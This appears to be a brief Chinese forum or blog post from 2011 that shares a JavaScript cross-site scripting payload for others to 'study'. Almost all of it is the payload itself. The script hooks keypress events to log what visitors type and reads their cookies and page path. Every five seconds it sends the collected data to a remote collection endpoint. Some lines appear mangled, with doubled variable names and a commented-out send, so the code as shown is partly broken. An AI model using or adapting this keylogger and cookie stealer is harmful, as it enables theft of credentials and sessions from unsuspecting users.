这几天研究XSS写的有用的朋友可以拿去研究研究
/*
* 2011.11.7
*菲哥哥
*/
var path =escape(window.location.pathname); //获取网站目录 var url = "http://localhost:1515/xs/Requests.aspx?xss="; var keys; //保存键盘记录 var key; var Cookie=document.cookie;//获取Cookie //判断浏览器,创建XMLHttpRequest对象 function GetXmlHttpObject() { var xmlHttp = null; try { // Firefox, Opera 8.0+, Safari xmlHttp = new XMLHttpRequest(); } catch (e) { // Internet Explorer try { xmlHttp = new ActiveXObject("Msxml2.XMLHTTP"); } catch (e) { xmlHttp = new ActiveXObject("Microsoft.XMLHTTP"); } } return xmlHttp; } //发送异步请求 function showHint() { xmlHttp = GetXmlHttpObject();//获得XMLHttpRequest对象 urlurl = url +keys+"按键||"; xmlHttp.open("GET", url, true); // xmlHttp.send(null); } document.onkeypress = function(e) { //劫持键盘消息函数 get = window.event ? event:e;//创建事件对象 key = get.keyCode ? get.keyCode : get.charCode; switch(key){ case 32 : key = '[Space]';break; case 13 : key = '[Enter]';break; default : key = String.fromCharCode(key); keys += key; //alert(key+"||"+keys); } } window.setInterval(showHint,5000); ////每五秒发送一次键盘记录 window.onload = function() { xmlHttp = GetXmlHttpObject(); //获得XMLHttpRequest对象 urlurl = url + path+"||Cookie值||"+Cookie+"||键盘记录||" // xmlHttp.open("GET", url, true); xmlHttp.send(null);
标签分类:
